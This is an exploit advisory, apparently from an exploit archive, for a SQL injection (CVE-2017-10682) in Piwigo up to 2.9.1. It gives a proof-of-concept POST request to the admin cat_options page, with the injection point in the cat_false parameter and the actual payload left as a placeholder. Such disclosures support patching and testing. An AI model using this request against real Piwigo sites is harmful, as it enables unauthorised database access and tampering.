# # # # # # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://piwigo.org/ # Software Link: http://piwigo.org/basics/downloads # Version: <= 2.9.1 # Category: Webapps # Tested on: WiN7_x64/WIN10_X64 # CVE: CVE-2017-10682 # # # # # # Exploit Author: Akityo # Email: akityo@foxmail.com # # # # # # Description: # # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter # in the comments or status page to cat_options.php. # # # # # # # # Proof-of-Concent: # # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1 # Host: www.test.com # Content-Length: 34 # Cache-Control: max-age=0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 # Upgrade-Insecure-Requests: 1 # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 # Content-Type: application/x-www-form-urlencoded # Accept-Encoding: gzip, deflate # Accept-Language: zh-CN,zh;q=0.8 # Cookie: null # Connection: close # # cat_false%5B%5D=[payload here]&trueify=%C2%AB # # # # # # #